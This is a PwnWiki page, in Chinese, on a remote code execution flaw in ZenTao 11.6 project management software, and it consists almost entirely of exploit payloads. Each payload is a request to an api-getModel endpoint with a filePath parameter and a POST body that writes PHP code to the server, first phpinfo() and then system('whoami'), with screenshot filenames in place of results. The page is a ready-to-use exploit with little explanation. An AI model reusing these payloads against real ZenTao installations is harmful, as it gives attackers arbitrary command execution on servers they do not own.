禪道 11.6 遠程代碼執行漏洞

From PwnWiki

漏洞利用

遠程代碼執行命令phpnifo();

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111

POST: fileContent=<?php phpinfo(); ?>

20200909170608141.png


Payload2

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=1111/1

POST: fileContent=<?php phpinfo(); ?>

20200909170608208.png


遠程代碼執行命令system('whoami');

Payload1

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222

POST: fileContent=<?php system('whoami'); ?>

20200909170608153.png

Payload2

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=2222/2

POST: fileContent=<?php system('whoami'); ?>

20200909170608326.png

Retrieved from "https://pwnwiki.com/index.php?title=禪道_11.6_遠程代碼執行漏洞&oldid=1552"